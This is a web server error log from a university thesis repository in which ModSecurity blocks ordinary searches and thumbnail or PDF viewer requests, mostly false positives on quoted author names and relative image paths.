[Mon Aug 28 07:33:04.345289 2023] [:error] [pid 37539] [client 47.128.26.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Korespondensi_-_11._Cost_Analysis_of_Lemon_Law_Warranties_for_Used_Equipments.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvrQMCo-f0AAJKjZqIAAAAG"]
[Mon Aug 28 07:37:11.109451 2023] [:error] [pid 37916] [client 47.128.22.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_s.d_Bab_II_-_Suwarno.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvsN8Co-f0AAJQcJxYAAAAF"]
[Mon Aug 28 07:39:50.403145 2023] [:error] [pid 37803] [client 47.128.28.142] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Budhi Satriawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvs1sCo-f0AAJOr9pAAAAAL"]
[Mon Aug 28 07:40:05.812591 2023] [:error] [pid 37844] [client 47.128.30.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ISSAF\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvs5cCo-f0AAJPUAeUAAAAA"]
[Mon Aug 28 07:53:03.510934 2023] [:error] [pid 37539] [client 47.128.29.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Turnitin_-_21._Optimal_Servicing_Strategy_Involving_Imperfect_Repair_and_Preventive_Maintenance_for_"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvv78Co-f0AAJKjZ0UAAAAG"]
[Mon Aug 28 08:09:58.107851 2023] [:error] [pid 38150] [client 47.128.21.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_-_Isra_Muliati.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvz5sCo-f0AAJUGIUwAAAAC"]
[Mon Aug 28 08:22:04.863884 2023] [:error] [pid 38388] [client 52.167.144.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22skripsi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv2vMCo-f0AAJX0cEMAAAAR"]
[Mon Aug 28 08:30:05.915046 2023] [:error] [pid 38059] [client 47.128.31.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hermawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv4ncCo-f0AAJSr27EAAAAO"]
[Mon Aug 28 08:46:51.816799 2023] [:error] [pid 38641] [client 47.128.19.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Thingspeak\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv8i8Co-f0AAJbxo9MAAAAJ"]
[Mon Aug 28 08:58:23.169507 2023] [:error] [pid 38646] [client 47.128.26.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Siti Rukiah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv-P8Co-f0AAJb21FcAAAAB"]
[Mon Aug 28 09:14:06.971589 2023] [:error] [pid 39237] [client 47.128.29.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_-_Nur_Falah_Maulana.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwC7sCo-f0AAJlFYc4AAAAU"]
[Mon Aug 28 09:18:32.419460 2023] [:error] [pid 39298] [client 47.128.23.220] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Celah  Kemanan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwD@MCo-f0AAJmCQc0AAAAE"]
[Mon Aug 28 09:26:41.334066 2023] [:error] [pid 39304] [client 47.128.25.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_-_31._Maintenance_Policy_in_Public-Transport_Involving_Government_Subsidy.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwF4cCo-f0AAJmIkwAAAAAT"]
[Mon Aug 28 09:28:20.743194 2023] [:error] [pid 39436] [client 47.128.19.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22used equipment\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwGRMCo-f0AAJoMHIsAAAAK"]
[Mon Aug 28 09:45:23.059877 2023] [:error] [pid 39524] [client 47.128.30.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+Rengga+Dwi+Prayoga". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+Rengga+Dwi+Prayoga\\x22:  Rengga Dwi Prayoga\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwKQ8Co-f0AAJpknHwAAAAC"]
[Mon Aug 28 10:15:14.325510 2023] [:error] [pid 40253] [client 47.128.28.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Turnitin_-_8._Game_theoretic_models_in_fleet_performance-based_maintenance_contracts.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwRQsCo-f0AAJ09ta0AAAAR"]
[Mon Aug 28 10:17:41.566846 2023] [:error] [pid 40259] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/01._Cover_-_M._Gani_Abdul_Goffar_-_41155010170035.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwR1cCo-f0AAJ1De5gAAAAS"]
[Mon Aug 28 10:17:46.952294 2023] [:error] [pid 40317] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//01. Cover - M. Gani Abdul Goffar - 41155010170035.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwR2sCo-f0AAJ19MbQAAAAQ"]
[Mon Aug 28 10:17:52.276075 2023] [:error] [pid 40306] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//05. Kata Pengantar - M. Gani Abdul Goffar - 41155010170035.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwR4MCo-f0AAJ1yqOgAAAAC"]
[Mon Aug 28 10:36:26.492149 2023] [:error] [pid 40564] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/01._Cover_-_Fajar_Fauzi_Saepurrohman_-_41155050160024.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwWOsCo-f0AAJ50-XsAAAAX"]
[Mon Aug 28 10:36:57.466912 2023] [:error] [pid 40564] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//06. Daftar Gambar - Fajar Fauzi Saepurrohman - 41155050160024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwWWcCo-f0AAJ50-YQAAAAX"]
[Mon Aug 28 10:37:01.169248 2023] [:error] [pid 40564] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//02. Lembar Pengesahan - Fajar Fauzi Saepurrohman - 41155050160024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwWXcCo-f0AAJ50-YYAAAAX"]
[Mon Aug 28 10:37:15.364464 2023] [:error] [pid 40560] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/01._Cover_-_M._Gani_Abdul_Goffar_-_41155010170035.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwWa8Co-f0AAJ5wzz0AAAAM"]
[Mon Aug 28 10:37:20.298876 2023] [:error] [pid 40560] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//06. Daftar Isi - M. Gani Abdul Goffar - 41155010170035.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwWcMCo-f0AAJ5wz0AAAAAM"]
[Mon Aug 28 11:25:07.600977 2023] [:error] [pid 41300] [client 47.128.23.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Guru tahsin\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwho8Co-f0AAKFUtjYAAAAR"]
[Mon Aug 28 11:26:47.290881 2023] [:error] [pid 41311] [client 47.128.25.250] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22e-menu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwiB8Co-f0AAKFfxcQAAAAG"]
[Mon Aug 28 11:33:12.164279 2023] [:error] [pid 41462] [client 47.128.21.149] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Turnitin_-_38._Service_Contract_With_Periodic_Preventive_Maintenance_For_A_Dump_Truck_Sold_With_A_Tw"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwjiMCo-f0AAKH29AgAAAAN"]
[Mon Aug 28 11:39:45.709153 2023] [:error] [pid 41702] [client 47.128.23.250] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hilman Hamdani\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwlEcCo-f0AAKLm8-EAAAAe"]
[Mon Aug 28 11:45:08.385026 2023] [:error] [pid 41524] [client 47.128.26.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Benie Ilman\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwmVMCo-f0AAKI09o8AAAAa"]
[Mon Aug 28 11:54:26.955586 2023] [:error] [pid 41905] [client 47.128.23.154] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LCD 16x2\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwogsCo-f0AAKOxb6IAAAAM"]
[Mon Aug 28 12:04:16.103578 2023] [:error] [pid 42081] [client 47.128.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Barang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwq0MCo-f0AAKRhkQAAAAAV"]
[Mon Aug 28 12:05:13.838732 2023] [:error] [pid 42024] [client 47.128.29.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pemerintah  Provinsi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrCcCo-f0AAKQoum8AAAAD"]
[Mon Aug 28 12:22:34.530699 2023] [:error] [pid 42412] [client 47.128.26.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/01._Cover_-_Fajar_Muhamad_-_41155030160038.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwvGsCo-f0AAKWsFkwAAAAO"]
